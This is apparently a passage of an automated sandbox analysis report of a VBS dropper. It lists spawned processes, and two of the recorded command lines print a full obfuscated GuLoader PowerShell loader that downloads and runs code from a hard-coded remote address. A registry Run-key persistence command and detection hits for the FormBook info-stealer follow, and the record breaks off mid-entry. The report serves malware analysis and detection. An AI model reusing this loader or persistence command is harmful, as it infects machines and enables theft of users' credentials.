                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                X-Redirect-By: WordPress
                                Location: http://facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=
                                X-Httpd: 1
                                Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                X-Proxy-Cache: MISS
                                X-Proxy-Cache-Info: 0301 NC:000000 UP:
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:17:13:02
                                Start date:02/05/2024
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
                                Imagebase:0x7ff706400000
                                File size:170'496 bytes
                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping google.com -n 1
                                Imagebase:0x7ff76ca40000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:3
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\PING.EXE
                                Wow64 process (32bit):false
                                Commandline:ping %.%.%.%
                                Imagebase:0x7ff76ca40000
                                File size:22'528 bytes
                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:5
                                Start time:17:13:05
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:6
                                Start time:17:13:06
                                Start date:02/05/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c dir
                                Imagebase:0x7ff626ba0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:7
                                Start time:17:13:06
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:8
                                Start time:17:13:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:9
                                Start time:17:13:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:10
                                Start time:17:13:09
                                Start date:02/05/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                                Imagebase:0x7ff626ba0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:17:13:14
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl ');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216 (Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens ' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens 'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216 (Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216 (Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216 (Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces: SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3 ,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
                                Imagebase:0xd10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2879301889.0000000008910000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2868524375.0000000005C62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2879459016.000000000CE4E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:17:13:15
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                                Imagebase:0x1c0000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:17
                                Start time:17:13:52
                                Start date:02/05/2024
                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                Imagebase:0xeb0000
                                File size:516'608 bytes
                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:true

                                General

                                Target ID:18
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                                Imagebase:0x1c0000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:19
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:20
                                Start time:17:14:07
                                Start date:02/05/2024
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                                Imagebase:0xf80000
                                File size:59'392 bytes
                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:21
                                Start time:17:14:38
                                Start date:02/05/2024
